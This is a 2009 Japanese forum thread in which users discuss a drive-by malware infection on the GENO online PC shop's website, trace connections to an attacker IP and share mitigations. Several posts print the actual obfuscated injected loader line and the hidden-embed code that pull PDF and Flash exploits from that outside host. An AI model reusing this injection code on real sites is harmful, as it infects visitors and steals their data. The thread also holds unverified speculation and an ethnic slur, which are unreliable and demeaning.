【注文0.1】Genoのサイトでウイルス感染…か？

中古PCとPCパーツの通販ショップGENO　ttp://www.geno-web.jp/
【客の返品】GENOを語るスレ29【オク出品】
http://pc11.2ch.net/test/read.cgi/pc/1237696091/326-
326 名前：名無しさん[sage] 投稿日：2009/04/04(土) 10:43:40 0
GENOのHPにアクセスしようとしたら、Acrobat Plug-in が起動して
This operation is not allowed. と表示する。
２台試して、2台とも起きた。
もしかしてウィルスに感染してる？

328 ：名無しさん：2009/04/04(土) 10:57:08 0
FirefoxでGENOのHPを開くと落ちるようになったｗ

343 ：名無しさん：2009/04/04(土) 15:11:06 0
隔離不可能・・・
これはシャレにならないくさい

365 ：名無しさん ：sage ：2009/04/04(土) 18:12:49 0
http://up2.viploader.net/pic/src/viploader968130.jpg
ゲノを開いた途端にこのザマｗ

377 ：名無しさん ：sage ：2009/04/04(土) 19:16:24 0
GENO開くとアクロバットリーダーが起動する

381 ：名無しさん ：sage ：2009/04/04(土) 19:59:32 0
genoルートキットかPHPのスクリプト改ざんされてる
パスワードとか全部抜かれてる可能性ある

94.247.2.195につなごうとしてるが何をされていることやらｗ

依頼308

383 ：名無しさん ：sage ：2009/04/04(土) 20:19:16 0
>>381
ttp://www.aguse.jp/?m=w&url=94.247.2.195&media=1&x=64&y=10
非営利団体SPAMHAUSプロジェクトによる
IPアドレスベースの送信者ブラックリスト
に反応ありますな

そこではないが昨日　Firefoxが落ちたわ

ウィルスでもいいや

僕の肛門もウイルスに犯されそうです

カブトムシくせーな

Operaで見た

まさかヌー即に立つとは

何も起きない件

ゴミ袋売った報復だろ

ν速公認ベンチマークブログ
いつでもレタス
http://azcji.cocolog-nifty.com/blog/cat1459704/index.html

ChromeでみたらどんどんPF食われてってワロタ

踏んじまったああああああああああああああ

365 名前：名無しさん[sage] 投稿日：2009/04/04(土) 18:12:49 0
http://up2.viploader.net/pic/src/viploader968130.jpg

ゲノを開いた途端にこのザマｗ

GENOの５００円MP3プレイヤーだけはガチ

>>10
なんだよこれｗ俺のQ9550が悲鳴をあげてる

昨日見てたところだわ
ニアミスこえええええええ

http://www.geno-web.jp/踏んだらしばらくして火狐落ちた＠ｹﾛﾘﾝD325

>>10
いつの間に公認になったんだよ

GenoでEee900A買ったが見事に使い道がない。

firefoxだと感染しないのか？

よくgeno見るけどというか今も開いてるけどやばいのか

パソコン蛾物故割れた

http://www.hellowork.go.jp/

>>23
ブラクラ貼るな氏ね

>>23
ブラクラ注意

ハロワの紹介無いと駄目だよ

23 名前：あぼ〜ん[あぼ〜ん] 投稿日：あぼ〜ん

えっ、いつからやばいの？

さっきブックマしてたGENOの商品ページを開いたけど大丈夫だったわ
ウィルス仕込まれてるのはトップページだけ？

そういえば昨日chromeで開いたけど何もなかったな
firefoxだけ？

何ともないっすよ

http://xepid.com/src/up-xepid6366.png

Macで特攻してくる

ここスゲー重いんだよな
見るからに怪しい

○就職先・便利なリンク一覧
■ハローワーク http://www.hellowork.go.jp/
■リクナビ http://www.rikunabi.com/
■日経就職ナビ http://job.nikkei.co.jp/
■Find Job! http://www.find-job.net/shushoku/
■asahi.com http://www.asahi.com/job/
■フロム・エー ナビ http://www.froma.com/
■バイトルドットコム http://www.baitoru.com/
■タウンワーク http://townwork.net/
■ジョブウォーカー http://www.jobwalker.net/
■DOMO NET http://domonet.jp/
■アルバイト.jp http://www.arbeit.jp/

JavaScriptを無効にすると普通に見えるな。

>>31
もうすぐGENTIMEだな

>>31
下のオリンパスのデジカメ安いな
今って800万画素もこんなに安く買えるのか？

俺も夕方頃にゲロHP開いちゃったんだよなぁ

ヤニをくれああががｋぇｒｊｋｌｇたいお３ｇぱ３ｗｑ５い

アクロバット入れてないと普通に見れるね。
アクロバットの脆弱性つかれて、見たやつあぼーん

さっき見てたが何もなかったぞ@火狐

>>33
でもこういういかにも怪しいB級ショップみたいなほうがワクワクするよね

あくろばっと入れてない俺大料理！！

>>37
9980円　送料無料
http://kakaku.com/item/00501811215/


Genoは送料700円とるから、むしろ高いのではないか。

8.1.4でもダメ？

入れなくて良かったAcrobat
入れてて良かったfoxitreader

おれもなったわ
Acrobat起動しようとすんのな

>>37
DSC925Zなら8,249円で買える

いまどきpdfでAcrobatはないわ

>>23
何だこのブラクラ？
PCのリセットボタン押したぞ
http://www.uploda.org/uporg2140521.jpg

PDF-XChangeなら大丈夫のようだ

>>45
9.1.0で死んだ

>>46
俺もFoxitで救われました

acrobatなんて入れてないや

あとNoScriptで

8.14入りでHP行ったけど重いぐらいで変化ないが
どんな挙動すんのさ？

>>52
なんと、じゃあ未修正だな
こんな身近で発生するとは

なんともなくてつまんね
いつも通り重いけど

うちはAcrobatのセキュリティ問題がニュースに出たときに
Readerの設定でJavaScript無効にしてたので
Genoのサイトにアクセスすると「Java使うよ？」てなダイヤログボックスが出た

え？マジ？
さっき開いたぞ・・・

開きなおしたら落ちたｗ
偉いメモリ喰ってブラウザがフリーズした

Opera落ちた

>>46
Firefoxのアドオンかと思ったら全然違った

> Genoのサイトにアクセスすると「Java使うよ？」てなダイヤログボックスが出た

俺も今日アクセスしたら出たけど
なんだこれ思ったけど無視した
セーフだったな

WpO1iRPgw6lc4aって何だよ

OSだのブラウザなら自動アップデートがあるが
他のソフトはアップデートしない情弱ばかりだからね
flashだのadobeだの

Adobe Reader開いて
[編集]→[環境設定]→[JavaScript]→[Adobe JavaScriptを使用]のチェックを外すんだ

>nslookup www.geno-web.jp
IP Address = 122.221.10.234
Host Name = 122x221x10x234.ap122.ftth.ucom.ne.jp

まさにｱｲｸﾞｰｼﾞｪﾉｻｰｲ

重いAdodeReaderを多重起動させてリソースくわせようとしてんのかな

GoogleChromeがクラッシュした

俺の最強のOperaが敗れるとは。。。

IPアドレス 94.247.2.195
ホスト名 hs.2-195.zlkon.lv
IPアドレス割当国 ラトビア ( lv )

ラトビア？

今PC買おうと思ってる奴、今は買うな!時期が悪い102
http://pc11.2ch.net/test/read.cgi/pc/1236010059/

具体的に何がどうまずいんだ。

>>73
バルト三国か
金融危機でﾊﾟﾈｪとこ

foxitreaderのスクリプト設定はどうなってるかと見てみたら
デフォルトではスクリプト機能してないな。
専用のアドイン入れないといけない。いや〜助かった。
まあ、acrobat用の脆弱性だろうけど

おれなんてウイルスソフトが破壊されて立ち上がらなくなって
入れなおしても何故かダメで
システムの復元で大丈夫になったくさいけど、
復元ポイントが数日前のだったからか、こんどは他のアプリがおかしくなった
あーイライラする・・・

381 名前：名無しさん[sage] 投稿日：2009/04/04(土) 19:59:32 0
genoルートキットかPHPのスクリプト改ざんされてる
パスワードとか全部抜かれてる可能性ある

94.247.2.195につなごうとしてるが何をされていることやらｗ

382 名前：名無しさん[sage] 投稿日：2009/04/04(土) 20:00:41 0
>GENO開くとアクロバットリーダーが起動する

こういうの怖すぎるな

383 名前：名無しさん[sage] 投稿日：2009/04/04(土) 20:19:16 0
>>381
ttp://www.aguse.jp/?m=w&url=94.247.2.195&media=1&x=64&y=10
非営利団体SPAMHAUSプロジェクトによる
IPアドレスベースの送信者ブラックリスト
に反応ありますな

あそこいつも重いよね

>>78
興味本位の質問なんだが
ウイルスソフトは何使ってたの？

>>79
((((((；ﾟДﾟ))))))ｶﾞｸｶﾞｸﾌﾞﾙﾌﾞﾙ

IE8、opera、チョロメ、プニルどれで開いてもフツー開く。
ウィルス対策ソフトが無反応で逆に怖いｗ

>>81
ウイルスバスター2008
ちゃんとブロックしたっぽかったけど、再起動したらおかしくなってた

>>83
アクロバット入れてないなら大丈夫でしょ

>>84
あくろばっと入れて無くてもどっかに繋がれたりしない？

確認の方法無いの？
若干ＨＤＤにアクセスが多い以外変化無いんだけど

ブラウジング用のoperaで見る分には全部切ってるしProxomitron様が居るから怖い物無しだが
ショッピングサイトとか信頼済みでIEで見るような所がウイルス感染は毎度の事ながら恐ろしいなｗ

genoのことだから後の対応も適当に済ますんだろなー

TCP Monitor Plus入れて接続先をモニターするとか

>>84
なるほど、バスターか・・・
でもバスターには悪い思い出しかない
試用期間中にCPU使用率100％のバグでOSクラッシュ起こしたんよ
今はESETに落ち着いてる

以前BenQのサイトもやられてたな

このスレタイはアウト
虚偽風説流布業務妨害　威力業務妨害

ノートンも反応無かったけど
sleipnirじゃ抑止効果ない？

アクアバットのぜいじゃくせいを突いてくるとは やつらもやるな

Firefoxが超不安定になった＞＜

バーチャルPCで踏んでみるから強力なのクレ

通販サイトでHP乗っ取られるなんて危険すぎるな
GENOの顧客の個人情報が全部漏れた可能性もあるだろうが

ファイアフォールのTCPモニタで見てみたら、サイトを開いた直後に94.247.2.195に繋いで数バイト送信してたｗｗ

クレジットカード使う店はちゃんと考えないとやばいんだな・・・

//94.247.2.195/news/?id=100
最終的に↑を読み込んでいるが、なにしてんだかはわからん

http://malware-web-threats.blogspot.com/2009/04/black-hat-seo-and-rogue-antivirus-p5.html

書いてあった。
ランダムファイル名のＰＤＦをダウンロードさせて、
リソースを食い尽くすそうです

ajax_lib.jsの最後に余計な行が加えられてるな。
それが94.247.2.195へアクセスさせてる。

用心してネット売買専用のPC使ったりしてても
その店でデータ抜かれるんじゃ防ぎ様が無いよなｗ

94.247.2.195に何か送信してるｗ

どうすりゃいいの？？＞＜

もっかいアクロバッドJAVAチェックしていってみる

ajax_lib.jsだけじゃなく、他のも書き換えられてた。

何を送信してたのか気になるな

>>10
なんだよこの糞ブログｗ

パケット解析まかせた

その前になんでgeno？
genocide(大量虐殺)くらいしか思いつかんが。

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5659
Acrobat 8.1.1 以前を使ってたやつはアウアウっぽい。
新しいの使ってたらセフセフっぽい。
genoで買い物した人は・・・

アドオンは普通無効にしてるだろ

ＰＦ食われまくってガチガチになったと思ったらやっぱりgenoだったか
これどうなってんの？何度か見に行ってしまった・・・

genoといえば・・・

ニュー即理系部員の場合・・・genome
ニュー即文系部員の場合・・・genova
ニュー即犯罪者予備軍の場合・・・genocide

>>90
今回のはESET/NOD32じゃ検知できてないっぽい
ZEROも絶賛スルー中
Avast!、カスペ、バスターは検知してくれる

うむ
うちもESETで華麗にスルーだ

javaチェック外そうが入れようが94.247.2.195とは送受信してるんだけど
もうよくわからん

やっぱ代引きが安全なのかな
ネットでクレカなんて怖くて使えん

勿論我らがAVGはちゃんと防御してくれるんだろうな。

クッキー
自動入力
オートコンプリート
そして注文

送信

まじか　この間genoで通販しちゃった俺涙目

VIPの屑どもを嵌めるか

なんの問題もない。
ただ、AcrobatReaderは最新だが。

>>112
Adobe Reader 9.1.0はセーフなんだよね？

>>100
document.write("＜div style=\"position:absolute; left:-1000px;
top:-1000px;\">");document.write('＜embed width=100 height=100
src="http://94.247.2.195/news/?id=2" type="application/pdf">＜
/embed>');document.write('＜embed width=100 height=100 src="ht
tp://94.247.2.195/news/?id=3">＜/embed>');document.write("＜/di
v>");
あとは頼む.
なんかフラッシュのActionscriptも実行しているみたいだが。。

やっぱ信頼できるところで買わないとダメだな。

genoなんか信頼できないだろ。
偽物のDVDドライブだか売ってたじゃん。

なんとも無いけど個人差があるのか？

genoのサイト開いた時に勝手にpdfが開いてなければセーフ？

ウイルス収集家の俺が華麗にゲット
JPCERTでも警告出てたAdobe Readerの穴使う奴くさいな

>>116-117
検体提出頼んだぜ

検体以前にアップデートをきちんとすることだな

これ？
http://www.adobe.com/jp/support/security/bulletins/apsb07-18.html

＞Adobe ReaderおよびAcrobatにクリティカルな脆弱性が発見されました。
＞攻撃者がこの脆弱性を悪用することに成功した場合、当該システムが攻撃者によって制御される恐れがあります。

途中ＨＤＤが急に遅くなったんだけど心配。
ノートンは検知なし。

reader9使ってる俺大勝利ｗ

>>130
リーダーが開かなくてもプロセス見ると実行されていて
メモリが430MBくらい食われてた

http://www.geno-web.jp/
code = 200
base = http://www.geno-web.jp/
body =
<html>
<head>
<META HTTP-EQUIV='CHARSET' CONTENT='Shift_JIS'>
<META HTTP-EQUIV='CONTENT-LANGUAGE' CONTENT='Japanese'>
<meta http-equiv='Content-Type' content='text/html; charset=Shift JIS'>
<title>中古パソコンとパソコンパーツの通販ショップＧＥＮＯ</title>
<meta name="description" content="激安！中古パソコンなら通販ショップＧＥＮＯ。お買い得商品から掘り出し物も見つかるかも。今すぐアクセスして確認してください！">
<meta name="keywords" content="中古パソコン,パソコン,パソコンパーツ,周辺機器,モニタ,ノートパソコン,サーバー,リサイクル">
<meta name="author" content="GENO">
<meta name="verify-v1" content="9NtgdPv9e8UfOFJPFckDs3EjEAL1qhllG7ieKGSVdXo=" />
</head>
<!--frameset用のHTMLにはbodyタグを書いてはダメです。winなどではページが見れなくなります。-->
<frameset rows="65,*" border=0 MARGINEWIDTH=0 MARGINHEIGHT=0>
<frame src="http://www.geno-web.jp/TopMenu.html" name=topmenu MARGINWIDTH="0" MARGINHEIGHT="0" scrolling=no noresize>
<frame src="http://www.geno-web.jp/MainMenu.html" name=main MARGINWIDTH="0" MARGINHEIGHT="0" scrolling=auto>
</frameset>

<!-- Google analytics -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>

<script type="text/javascript">
_uacct = "UA-524772-1";
urchinTracker();
</script>
</html>

ウイルスソフトの対応一覧
http://www.virustotal.com/analisis/48cfd289b06a1fb46dfbcb9fc8bad17a

>>137
XPでﾒﾓﾘ1GBだが、
俺もﾒﾓﾘ食われてた。

acrobat未インストール、fxで開いてfirebugのモニタで追ってみた
フレームのどれかに、oHY.pdfというやつがいて、94.247.2.195から参照されてるっぽい

他にもpdfやswfもあるっぽい

>>141
そこ非営利団体SPAMHAUSプロジェクトによるIPアドレスベースの送信者ブラックリストにのってるね

偽のセキュリティソフトをインストールするトロイらしいな

これ2ch見てない人気づかないんじゃない？
Genoはトップページにデカく経緯を乗せとけよ

狐3.08で何度アクセスしても

124.32.208.29
122.221.10.234

にしか繋ぎに行かないけど・・・

genoに知らせたやついんの？てかもう店も気づいてるか

USBメモリ10円の神価格かと思ったら数量1の上に総量糞高い糞の店だし潰れろよ

まじかよー　2,3日前安いノートの宣伝を2chでみて開いちゃったぞ

朝から報告あるのにまだ放置されてるってこと？
もう修正されてるんでしょ？

ふーん

>>147
気づいてたら速攻でページを一時的に閉鎖するだろ？
告知なんて閉鎖した後で書けばいいだけだし

まぁ、小数点以下の注文が出来ちゃう店だし、鯖缶のクオリティに期待する方が・・・

>>150
放置されてますが( ﾟДﾟ)ﾅﾆｶ?

まーだ直ってなかったのか
さすがSTEPの残骸

生成されたHTMLソース見てるが、埋め込みでpdfが記述されてんな
あと、jqueryも読み込んでら
ワンセットのクラックか？

NoScript入れてて助かった

このサイト利用者の個人情報はザルだと思った方が良さそうだな

http://www.geno.co.jp/xmlrss/ajax_lib.js
に
document.write(unescape('%3C4x4sWXkcr4Si4x4plct4x4%20P0srP0cWXk%3DC2%2F%2F4x49lc4lc%2EP02C247lc%2E4S2%2E1lc95%2FP0jP0qu4x4erP0y%2Ejs%3E4x4%3Cmb%2FC2s4x4cript4S%3E').replace(/WXk|4S|P0|4x4|mb|lc|C2/g,""));
って書いてあるね
unescapeすると
<script src=//94.247.2.195/jquery.js></script>
になる。
アクセスしちゃだめだぞｗ

もっと優しく教えてくれ
どうなる？

>>139
俺カスペにしようかな…

>>161
俺は火サスのほうが好き…

他のＰＤＦファイルが開けなくなった

XPにてFirefox(最新）、Acrobat9で昼間Genoサイト見て固まったんで
再起動掛けたんだが、抜かれたり仕込まれたりってあるのかな？
Avastは何も反応しなかたんだが、今フルスキャン中・・・
AcrobatもUpdate中

Adobe Readerを8.1.4から最新版にしてアクセスしたら、
余計負荷が高まった感じ。

8.12だったけど
メモリ食いまくってIE8がフリーズしただけだった
これってｾﾌｾﾌなの？

>>164
JavaScript切ってなければアウチ

>>164
うちも最近何回かGenoのサイトを見てたんで
ノートン先生の4/3付けの最新パターンファイルファイルで
スキャンしたけど、なんも出なかった。

>>139によるとノートン(Symantec)もまだ検出できてない

>>167
レスありがとです。
・・・何抜かれてるんだろう（ｶﾞｸｶﾞｸﾌﾞﾙﾌﾞﾙ）

>>168
>>139

javascriptも何もかも全部切ってちょっと見てこようかな

もしかしてavast大勝利？

>>168
>>139
先生も知らない奴じゃねぇ？

>>170
いま調べてる
PC内に抜かれてやばいモノがなければとりあえずはOK

genoのホームページ
↓
94.247.2.195から***.pdfをダウンロードして実行させられる
File size: 10417 bytes
MD5: af28f3bc9424a3da7ff8bc84740bce93
ウイルスソフト未対応
↓
Adobe Reader and Acrobat 8.1.1 and earlier の脆弱性をつかれて、
ウイルスを仕込まれる
ウイルスソフトで対応状況http://www.virustotal.com/analisis/48cfd289b06a1fb46dfbcb9fc8bad17a

防御できなかった人は、c:\にへんてこなファイルがあるかもしれん。
タスクマネージャでcmd.exeが動いてるかもしれん。

対処方
http://anubis.iseclab.org/?action=result&task_id=1890669b0bd937574e5be45e24c63ea80&format=html

普通に面白がって何回も見てるんだが、これってやばいのか？俺もがくぶるなってきた

たいていこういうのはネトゲのIDパスとかでしょ抜かれるのって

君子危うきに近寄らず
くわばらくわばら

Adobe Readerの最新版って9じゃなかったっけ

>> 176
ポップアップブロックが作動してＤＬされなかった。。。。

これはセーフ？

>>176
cmd.exeあるよおれおわった（ぼうよみ）

何抜かれるのか見るためにアドビ入れようかな

別に抜かれて困るようなモノは無いが・・・アクセスしてみるか

>>159
/*
* jQuery JavaScript Library v1.3.1
* http://jquery.com/
*
* Copyright (c) 2009 John Resig
* Dual licensed under the MIT and GPL licenses.
* http://docs.jquery.com/License
*
* Date: 2009-01-21 20:42:16 -0500 (Wed, 21 Jan 2009)
* Revision: 6158
*/


javascript読めないんだけど、メインには何が書いてあるんだろ

>>180
うん。
うちはAcrobat 9 Pro Extendedの9.1.0を入れてるけど。

写真が抜かれてぼっさん的な存在になったら嫌だな

ttp://www.geno-web.jp/ を開くと

この Web サイトはサイトは、'Microsoft Corporation' からの 'Microsoft Data Access
- Remote Data Services Dat…' アドオンを実行しようとしています。Web サイトと
アドオンを信頼し、アドオンの実行を許可するには、ここをクリックしてください...

ってメッセージが出るけどクリックしても安全？

Process Explorerでプロセス一覧見ても普段どおりだな。。。

flashもアップデートしとけよ
どうせそのうち似たようなこと起こるから

>>188

なかはラメええええええええええええええええええええ

>>188
駄目。
それ踏んだらアウト。

>>188
安全なわけないだろ・・・・

これくさい
http://cpanel.sslpayments.com

じゃあgenoでマカフィーも買えばいんじゃね？

genoオワタ？

cmd.exeって普通にsystem32フォルダにあるんじゃないのか？
俺もあった

今走ってるかどうかじゃないの
ちなみにコマンドプロンプトのことな

>>185
それ自体は普通にAJAXで使われるjQueryライブラリなんだけど、
恐らく、その不正アクセス先にアクセスするとjQueryライブラリを利用した
別のjQueryスクリプトが走って
それで何らかの情報が抜かれるんだと思う。

プロセスが動いてるかどうかってこと
コマンドプロンプト開いてなけりゃcmd.exeは普通動いてない

動いてなきゃいいのね、すまそ

ただのコマンドプロンプトだろ…

cmd.exeすらない…

アクセスしてないけど

genoは昔はもっとましだった気がするが
最近はゴミしかない

そのcmdファイルが改ざんされて、変なことさせるんじゃね？

まさになりすましのトロイの木馬

>>197
そうじゃなくて、タスクマネージャのプロセスにコマンドプロンプト使ってないのにcmdがあったらアウトってこと。

>>159
unescapeすると、じゃなくてunescapeしてreplaceすると、だった

94.247.2.195/jquery.jsを見てみたんだが、これjQueryを改造してあるね。
94.247.2.195/news/?id=100
にアクセスするよう仕込んであった。

で、94.247.2.195/news/?id=100 にはNo newsとか書いてあるんだが、ソースを見るとキャラコードで暗号化されたスクリプトが仕込んであって、それを解読すると

・94.247.2.195/news/?id=2 をPDFとして開く
・94.247.2.195/news/?id=3 を開く

といった動作をするようになっていた。id=2はPDFで、id=3はFlash。
くれぐれも注意、↑のURLは間違いなくウィルスなので開こうとしないこと。

>>182
cmd.exeファイル自体は存在するのが当たり前では？
タスクマネージャで実行されてたら問題ありだけど。

試しにアクセスしてみたら、スパムメールサーバーがポート叩いて来るよ

システム復元＆アドビ削除でおｋ？

いんたーねっとて怖すぎ＞＜

geno終わったな

俺のexpert PDFがこんなところで役に立つとは。
思いから捨てようと思ってた

Mac OSXのFirefoxもアウトです。

>210
違う。AppleでMac購入

Foxitが流行ってたこともあるけど今はもう廃れたのかな

なんかこのスレの人たちかっこいい

>>208
ああ、すまん。ネタじゃなくてマジだったのね＾＾；

諸君！
こんなめにあわせてくれたＧＥＮＯをどうしてくれようか？

PDFだけじゃなくFlash、ActiveXも呼んでるのか？
>>188とか>>207とか見ると

>>199
オリジナルのjQueryとdiffかけてみると分かるんだけど、jQueryを改造してあるよ

今から踏んで来る

>>214
使ってるよ
Adobeとかありえん

4/3のセールでレノボのミニノート3万くらいで10台出てて即完売してたけど購入したやつ(((；ﾟдﾟ)))

cmd.exeを起動したことがないのにconime.exeが常駐してたら
cmd.exeが実行されたってことだな(XP)

あ、>>223は>>216への間違い＾＾；

>>218
俺、テンパってるんでネタに反応できんｗ

>>209
昔流行ったイオナズンスクリプトみたいに踏み台にされちゃうのかも知れないね。

つまり今気づかずにクレジットカードで買い物している人は
明日には偽のカードが作られて東欧あたりで不正利用されるってことかな

CCCなんてカッコいいexeいてはりますけど怖くネ？

>>221
なるほど。
そーいう訳なのか。

他人のＨＰ書き換えるとかどうやってんだし

>>230
ATIグラボ乙

あ、事故解決

普通にアクセスできるけど？

きじゃくせいｵｿﾛｼｽ

　　　　　　　　　,rｭ､_＿
　 　 　　　　 　 ｆヽ､〕 　 ｀`丶 ､
　　　　　　　　　辷_|　　　　　　 ｀丶、
　　　　　　　　 （_-‐! 　 　 　 　 　 　 ヽ､＿ _
　　　　　　　 　 ｒ'二!　　　　　　　　　´　 　 　￣　＞ｰ ' ´　￣ 　￣　 ー -　._
　　　　　　 　 　 )-､{　　　　　　　 ＿ _＿ _　　　　　　　　　　　　　　 　 __,z‐マ¬ｎ
　　　　　　　　 （_＞}　　　 ,ィ７丁／//／//７ｔ-､__　　　　　　　　　,r＜＼ソ＾trヘ.}
　　　　　　　　　ヽｭ,廴.ｨ斥r'^ｰ'⌒ｰ'⌒ー'⌒ｰく/ ﾊ.__　　　　 　,r'こ＞'⌒′ ハ､丿
　　　　　　 　　　に匁ﾁ‐'".:.:;:.:.:.:;.:.:.:.;': : ;': : : : :└く } }ﾄ､　　rく＼ 丿 　 　　/ｰf´
　　　　　　　　 ,ｨ夕'".;:;:';:::::;:': : ;:': ::〃::/:: : : :/:::i: : :`y' ∧く.`Y⌒´ 　 　　∠^Y
　 　　　　　／/〃.::;:'/;'::::/ : :/::::://:://! ::::::i:!:::|:!:::::::`ｰj＾ｧ_>′ 　　　 ∠ヽ_ソ
　　　　　 　 ｀Y!:j .::::i::l:j::,::l: : j :::::jl !:::|l:l:| ::::::ｉ:|:::l:|::::::::i:::(/ h 　 , -ｏ-< ヽ`〈
　　　　 　 　 　 　 / /V　 ヽ l＼|:ｲ　.:ト- ﾍ　　.:.ﾄ.:イ|― l:. |　　　 ,.ィ
　　　　　　_ .ｨ'¨i　l./!　 :　:　:| .:{ﾑト､|:!　　 !斗≦_|ﾊ:|l.　 |::.|__.. イ´ﾑ
　　　　_j´/_ﾉｰ'^Vl,┴j:| ..:. .::|:イ{ｨ示ﾐ｢　｀ ｢ｲ示ヽﾄ､l!|　 !´了／´ /
　　　 j ﾉ-'　 /´　 ,イ.::A.:.|:.小ﾄ.ﾄｨ{::j:}　　/' ﾄｨ{::j::} }小　 |__rく´　 z′
　　　 ´ > - ' ┬ ´　l:..:ﾄ.V!:.:||　 辷ソ　　 　 ﾞ辷ソ　｜ r┴‐ァｰく　　　　あばすとー
　　 　 .小. 　 /l|　　 ヽトzハl:! '''　　　　′　　 ''''　　|　 `lﾆ^ーァヘ、
　　　 /! !lﾄ　 i|l.|　 　 　 /.:..八　 　 r======､､　 　 | く⌒ｰ'　 `ｧ'´.ｨヽ
.　　 /'|ﾄ._ﾊ V !||　　　　{:.ィ:.:ﾄ{ヽ.　 {. 　´￣￣ }　 .ィ|　.:下ミ.､__`¨´_,　ﾄ､
　　/ ﾊ|{ |ハ.Vﾊ!__ri―く　ヽ:|　　}＞｀..￣￣ .´イ／_j .::.::|　／￣|ﾄ､　 !! lヽ.__
　　|｜|l.| l　 l !| | ｀ l　　 l　 ヽ　 {ﾄ vﾐ､工二= ´ /´ｲ.:.:.:.:!　　 ／!!|ﾊ j ! j　lヽ.

洒落にならん
カードやら銀行やらその他オンライン関係すっぱ抜かれたかもしれん・・・

>>233
うんｗ

情報漏えい起こしたパーツ夜はつぶれる
例：ｐｃサクサス


豆知識な

>>229
ショッピングサイトのクラッキングならそーいう目的しか考えられないわな。普通。

同じく

だって確認したら色々ノートンが遮断したり許可した形跡あったもん
でも今はいたって普通。（再起動とＩＰ変更ｗ）

とにかく分かり易くまとめてくれ、頼む

ネトゲならいいけど

カード・銀行・証券だったらきついよな。

とりあえずタスクマネージャで変なプロセス動いてないかチェックしとけよ
taskmgr.exeがあったら危険

ここ送料で評判悪いみたいだけど
小物でも3個かったら送料3個分かかるの？
1個分ですまないのかな

規制でPCから書き込み出来ないから辛い


このサイト、アクセスしてきた相手の情報ぶっこ抜いてるね

CALMAIN.exeが実行プロセスみたいだな

最近GENOでクレカ使って買い物した奴は今すぐ止めてもらえ

この文章はjavascriptが含まれていますってのではいをクリックしたらアウアウ？

>>225
conime.exe立ち上がってた((((；ﾟДﾟ))))ｶﾞｸｶﾞｸﾌﾞﾙﾌﾞﾙ

>>249
聞くまでも無いだろｗｗ

wgetしてみた。ヘッダはPDFのファイルだけど47行目からはJavaScriptだ。

こういうところで詳しそうな人ってカッコいい

tourstart.exe
Orun32.exe

なにこれ

ていうかGENOってクレカ通らなかったんじゃ無かったか？ｗ
今サイト見られないからうろ覚えな記憶を確認できないが

振込みと代引きしか選択出来なかったような気がする。

lynx使ってる俺には関係のない話っぽい

Acrobatもjavaも最新にしてたらjavaのダイヤログでYesしても大丈夫っぽい
（Yesしないほうがいいのは当然だが）
ソースは俺

何話してるかわけわかんないけど、俺もいつかはこの会話に混じれるように
なりたい。UNIXの閉鎖騒動の時もこうゆう人たちが助けてくれたんだよね(´・ω・｀)

なんかHPのソースとか見て詳しく理解できる人がいるみたいなので
ちょっとお聞きしたいんですが、今回のこれってGENOのサーバーが
セキュリティ的に甘くて、外部から誰かにこういう仕掛けをされたってことになるんですか？

>>255
送料が無駄に高い事しか記憶にないわｗ

Yes/Noは聞かれなかったが、普通聞かれるﾓﾝですか？

>>256
自作板かPC一般のスレでクレカ承認おりなくて大正解だったなという書き込みを見た気がするｗ
ついでにSSL云々も書かれてた様なｗ

感染してきたけどavast先生もwindowsdefenderも無反応
virustotalでは検知してたのに

顧客なんぞどうでもいいから（購入した事ない）
俺のＰＣに何したのかが重要だ
リカバリやりたくないおー

>>260
故意に仕込んであるんじゃないか

>>247
今ファイル検索したけど、そのEXEは居なかったわ。

これだからいやなんだ

最悪すぎる

情報抜かれた

>>262
AdobeReaderのjavascriptが切ってあると有効にして良いか聞かれる

94.247.2.195
hs.2-195.zlkon.lv

ってnslookupで出たんだが。
ラトビア共和国のドメインなんだよね、このPC。
＄５０もするドメインだから、リアルにこの国にあると思うんだけど。

>>267
ゴメン冗談ねｗ

>>260
○外部からFTPなどを通じてアクセスされた
○設置済のプログラムが悪用できるようになってた(外部からアクセス)
○同じサーバー利用者から、アクセスされた(外部からサーバー経由)
○内部の人が書き換えた(HP製作者など)
○何かのウイルスにひっかかった

色んなことが考えられるな。

vistaだと何も起こらないぞ。
avastも反応なし。

>>271
fack you

>>262
自動的に有効にする設定にしてるなら、アウトじゃ？

かーちゃんのPCのadobeの設定勝手に変えておいて正解だったわ

最悪の場合は何か妙なプログラムを仕込まれて
今後、他の買い物の際の認証情報が筒抜けとかか
GENOはクレジット決済をしてないから一切無視で責任取らずってパターン

今感染しているか見分ける方法はあるの？
ノートンは無反応みたいだけど。

>>277
Genoがそこだけ修正して
何の発表もしないと、
気付かないままとかありえるから怖いよな。

AntiVirとBitDefenderも非対応とか

>>254
お前余計なモン削除とかしたことないんじゃね？

タスクマネージャーで
cmd.exeが立ち上がってないか？

つか鯖に一週間分の自動バックアップあったわ
今日の午前に報告あるから２日位戻せばおｋかな？
タイムスリップしてくる、じゃ！

ただひとつ言える事




パソコンを今は買うな時期が悪い

おい踏んでしまっただろ・・・

avast! v4.8 Pro
Acrobat 8.1.4

異常なし！

アクセスしてみたけど、タスクマネージャーでcmd起動した記憶がないのに
conime.exeがプロセスにある人はマズそうだな
パスや個人情報抜かれてるかもne

taskmngr
cmd
coime
が立ち上がってるとやばいのか？

tvrock.exeが妙にメモリを使っていて怖いです＞＜

冗談は置いといて、これが出ていたらアウトっていう決定打はcmd.exe？

>>272
邪推するけど、最近やたら自作PC板やハードウェア板なんかでも
genoのサイトのアンカーを張りまくった宣伝レスが不自然に多かったんで、
ある程度組織的にクラッキングしていたのかもしれないね。
この前はν速でもスレが立ってた位だし。↓の。

CPU C2D Ｔ7250、 Vista Businessの15.4型NEC製ノートPCが46000円
http://tsushima.2ch.net/test/read.cgi/news/1238662017/

無論日本人や一応日本語でレスを書けるチョンなんかが犯人なんだと思うけど。
ぶっちゃけ、↑のスレでPC買った奴はマジでヤバいと思う。

踏んでしまった
対処方法を教えてくれ

>>10
これはキツイすｗ

genoのサイトって元々重いじゃん
もしかして前から感染してたとか…？
三日前くらいにアクセスしたんだけど

一番良いのはTrueImageとかでドライブをイメージBackupして
感染したと思われる前にリストアする事だなｗ

三井住友とかGENOに送金するのに無料だから(ネット口座なら)
三井住友使ってる俺は、結構恐怖感じるぜ…。

Ctrl+Alt+Delでタスクマネージャー立ち上げてプロセスの中に
conime.exeがあるかどうか確認しろ
コマンドプロンプト使ったかどうかも思い出せ

